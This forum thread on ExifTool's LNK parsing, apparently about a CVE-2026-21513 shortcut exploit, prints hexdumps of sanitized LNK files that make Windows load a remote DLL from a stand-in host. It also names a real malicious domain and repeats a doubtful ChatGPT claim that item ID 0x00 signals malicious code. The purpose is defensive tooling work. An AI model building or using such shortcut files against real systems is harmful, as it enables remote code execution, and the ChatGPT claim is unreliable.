LNK file target specified by way of Folder GUID is not showing actual target

[wdormann]

Sorry to keep bugging about obscure LNK files, but I see that exiftool is part of VirusTotal, so I figure its proper operation will help us weirdos who look at such things.

Anyway, there's a public Akamai writeup about in-the-wild exploitation using LNK files and CVE-2026-21513. In the end, Windows is coerced to open a LNK file. I have a completely sanitized version of this LNK file, which ends up retrieving and running http://example.com/payloads/calc32.dll by way of using the "Control Panel" Folder GUID of 26EE0668-A00A-44D7-9371-BEB064C98683

Current output from exiftool:

ExifTool Version Number         : 13.52
File Name                       : controlpanel.lnk
Directory                       : <redacted>
File Size                       : 308 bytes
File Modification Date/Time     : 2026:03:03 11:24:25-05:00
File Access Date/Time           : 2026:03:03 11:24:28-05:00
File Inode Change Date/Time     : 2026:03:03 11:24:25-05:00
File Permissions                : -rw-r--r--
File Type                       : LNK
File Type Extension             : lnk
MIME Type                       : application/octet-stream
Flags                           : IDList, Unicode, TargetMetadata
File Attributes                 : (none)
Target File Size                : 0
Icon Index                      : (none)
Run Window                      : Normal
Hot Key                         : (none)
Folder GUID                     : Unknown (26EE0668-A00A-44D7-9371-BEB064C98683)

Exiftool correctly reports that the Folder GUID is 26EE0668-A00A-44D7-9371-BEB064C98683. Not very important is that it says that it's "Unknown" as opposed to "Control Panel"

But perhaps more important is the lack of displaying the actual target of http://example.com/payloads/calc32.dll

TBH, I'm not too familiar with the LNK file format, and even beyond that, even the Windows GUI doesn't show the actual target for such LNK files. But if it's easy to add this info to exiftool, then I figure that'll be a win.

[boardhead]

I must admit that I'm struggling with decoding of the important LNK information because it is so poorly documented. The calc32 target doesn't appear anywhere in the LNK file you sent, so I won't be able to report that. The only string in this file is "\wellnesscaremed.com\buch\d\s.d", and if I am understanding correctly, the calc32 target must be loaded remotely from that URL. I will, however, see about extracting that string if I can figure out how it is stored. Somehow it is inside the terminator of the item list, but I don't know how Windows interprets this because it is completely undocumented.

• Phil

[wdormann]

Sigh. Sorry, I attached the incorrect LNK file. Try this one instead. wellnesscaremed[.]com is a malicious host, so please take caution with that file.

sample.zip

hexdump -C controlpanel.lnk                                                                                                                                                                           
00000000  4c 00 00 00 01 14 02 00  00 00 00 00 c0 00 00 00  |L...............|
00000010  00 00 00 46 81 00 08 00  00 00 00 00 00 00 00 00  |...F............|
00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000030  00 00 00 00 00 00 00 00  00 00 00 00 01 00 00 00  |................|
00000040  00 00 00 00 00 00 00 00  00 00 00 00 e2 00 14 00  |................|
00000050  1f 70 68 06 ee 26 0a a0  d7 44 93 71 be b0 64 c9  |.ph..&...D.q..d.|
00000060  86 83 0c 00 01 00 84 21  de 39 00 00 00 00 c0 00  |.......!.9......|
00000070  00 00 37 ff ff ff 00 00  00 00 00 6a 00 00 01 00  |..7........j....|
00000080  00 00 2b 00 37 00 5c 00  5c 00 65 00 78 00 61 00  |..+.7.\.\.e.x.a.|
00000090  6d 00 70 00 6c 00 65 00  2e 00 63 00 6f 00 6d 00  |m.p.l.e...c.o.m.|
000000a0  5c 00 70 00 61 00 79 00  6c 00 6f 00 61 00 64 00  |\.p.a.y.l.o.a.d.|
000000b0  73 00 5c 00 63 00 61 00  6c 00 63 00 33 00 32 00  |s.\.c.a.l.c.3.2.|
000000c0  2e 00 64 00 6c 00 6c 00  00 00 00 00 00 00 00 00  |..d.l.l.........|
000000d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 3c 68  |..............<h|
000000e0  74 6d 6c 3e 00 00 00 00  00 00 00 00 00 00 00 00  |tml>............|
000000f0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000130  00 00 00 00                                       |....|
00000134

[boardhead]

OK. I've done a bit of research and ChatGPT says that an item with ID 0x00 in the item list is malicious code, so I'll do a brute-force extraction of the contained strings, and ExifTool 13.53 will show this:

% exiftool controlpanel.lnk -lnk:all -warning
Flags                           : IDList, Unicode, TargetMetadata
File Attributes                 : (none)
Target File Size                : 0
Icon Index                      : (none)
Run Window                      : Normal
Hot Key                         : (none)
Folder GUID                     : Control Panel
Malicious Code                  : +7\\example.com\payloads\calc32.dll, <html>
Warning                         : Possibly malicious code in item list with ID 0x00

• Phil

[wdormann]

I'm somewhat skeptical that an ID of 0x00 is "malicious code", as it sounds like something that ChatGPT would make up.
As for the in the above sample, I suppose that's just left over stuff from the full exploit chain (it needed an <html> early in the file to trick Windows into parsing it as HTML).

Anyway, here's a more minimal LNK that behaves the same:

hexdump -C controlpanel-minimal.lnk.download
00000000  4c 00 00 00 01 14 02 00  00 00 00 00 c0 00 00 00  |L...............|
00000010  00 00 00 46 81 00 08 00  00 00 00 00 00 00 00 00  |...F............|
00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000030  00 00 00 00 00 00 00 00  00 00 00 00 01 00 00 00  |................|
00000040  00 00 00 00 00 00 00 00  00 00 00 00 e2 00 14 00  |................|
00000050  1f 70 68 06 ee 26 0a a0  d7 44 93 71 be b0 64 c9  |.ph..&...D.q..d.|
00000060  86 83 0c 00 01 00 84 21  de 39 00 00 00 00 c0 00  |.......!.9......|
00000070  00 00 37 ff ff ff 00 00  00 00 00 6a 00 00 01 00  |..7........j....|
00000080  00 00 2b 00 37 00 5c 00  5c 00 65 00 78 00 61 00  |..+.7.\.\.e.x.a.|
00000090  6d 00 70 00 6c 00 65 00  2e 00 63 00 6f 00 6d 00  |m.p.l.e...c.o.m.|
000000a0  5c 00 70 00 61 00 79 00  6c 00 6f 00 61 00 64 00  |\.p.a.y.l.o.a.d.|
000000b0  73 00 5c 00 63 00 61 00  6c 00 63 00 33 00 32 00  |s.\.c.a.l.c.3.2.|
000000c0  2e 00 64 00 6c 00 6c 00  00                       |..d.l.l..|
000000c9

(just delete everything after the trailing null byte)

Just so I can test this "malicious" vs. "not malicious" theory, which of these bytes is the "item ID" ?

[boardhead]

This new version is very different. The file is no longer valid since the target ID list is truncated or missing. I'll add warnings for all of the errors I see when reading the file so this one will give a "Truncated target ID list" warning.

• Phil

[boardhead]

But to answer your question, the item ID is the 00 at offset 0x70 in the 2nd file you sent. There is no item list in the latest file because the target ID list runs to the end of file.

• Phil

[wdormann]

Thanks for the info. And yeah, I'll admit that I know almost nothing about the LNK file format. Sorry. I've just been looking at behaviors I've seen.

For this particular ITW exploit LNK file, it's a "normal" shortcut that specifies a "Folder GUID", but it also has some HTML content and a stray <html> identifier in the file as well. As such, my earlier example had the stray <html> part in it, and this latest one stops right after the remote calc32.dll file.

Anyway, if the file is no longer valid trimmed in this way, it is perhaps worth noting that Windows sees no problems with it whatsoever and will run the target. (Load the DLL as if it were a control panel library).

Unrelated, in your example exiftool output above, I'm not sure what the significance of the +7 is before the path to the target library to load. Those bytes can be changed to anything and it still functions the same.

[wdormann]

Oh, actually, now that I look into it, I can see that LnkParse3 does indeed pick up the actual target. Specifically, it indicates: Cpl file path: \\example.com\payloads\calc32.dll

lnkparse.exe controlpanel.lnk.download
Windows Shortcut Information:
   Guid: 00021401-0000-0000-C000-000000000046
   Link flags: HasTargetIDList | IsUnicode | EnableTargetMetadata - (524417)
   File flags: (0)
   Creation time: null
   Accessed time: null
   Modified time: null
   File size: 0
   Icon index: 0
   Windowstyle: SW_SHOWNORMAL
   Hotkey: UNSET - UNSET {0x0000}

   SIZE: 308

   TARGET:
      Items:
      -  Root Folder:
            Sort index: Unknown
            Sort index value: 112
            Guid: 26EE0668-A00A-44D7-9371-BEB064C98683
      -  Control panel category:
            Category id: 0
            Category: All Control Panel Items
      -  Control panel CPL file:
            Signature: '0xFFFFFF37'
            Cpl file path: \\example.com\payloads\calc32.dll
            Name: ''
            Comments: ''

   LINK INFO: {}

   DATA: {}

   EXTRA: {}

So maybe if you want to improve exiftool's handling of LNK files, maybe you could look at LnkParse3?

FWIW, My hand-minimized case does show a stray character after the Cpl file path, but apparently it's not enough to prevent Windows from loading it.

lnkparse.exe controlpanel-minimal.lnk.download
Windows Shortcut Information:
   Guid: 00021401-0000-0000-C000-000000000046
   Link flags: HasTargetIDList | IsUnicode | EnableTargetMetadata - (524417)
   File flags: (0)
   Creation time: null
   Accessed time: null
   Modified time: null
   File size: 0
   Icon index: 0
   Windowstyle: SW_SHOWNORMAL
   Hotkey: UNSET - UNSET {0x0000}

   SIZE: 304

   TARGET:
      Items:
      -  Root Folder:
            Sort index: Unknown
            Sort index value: 112
            Guid: 26EE0668-A00A-44D7-9371-BEB064C98683
      -  Control panel category:
            Category id: 0
            Category: All Control Panel Items
      -  Control panel CPL file:
            Signature: '0xFFFFFF37'
            Cpl file path: \\example.com\payloads\calc32.dll�
            Name: ''
            Comments: ''

   LINK INFO: {}

   DATA: {}

   EXTRA: {}

[boardhead]

Thanks for the info. I'll look into this.

• Phil

[boardhead]

I see the issue: Windows and lnkparse apparently both process an invalid target ID list without any warnings or errors. The list itself runs past the end of file, and the last item in the list (ID 0x00) is also truncated. ExifTool was aborting on either of these errors. I'll just warn instead.

[boardhead]

BTW. You've got to appreciate the honesty in the Security section of the Microsoft MS-SHLINK specification document:

[boardhead]

ExifTool 13.53 is now available, with a significant re-write of the LNK file parsing.

• Phil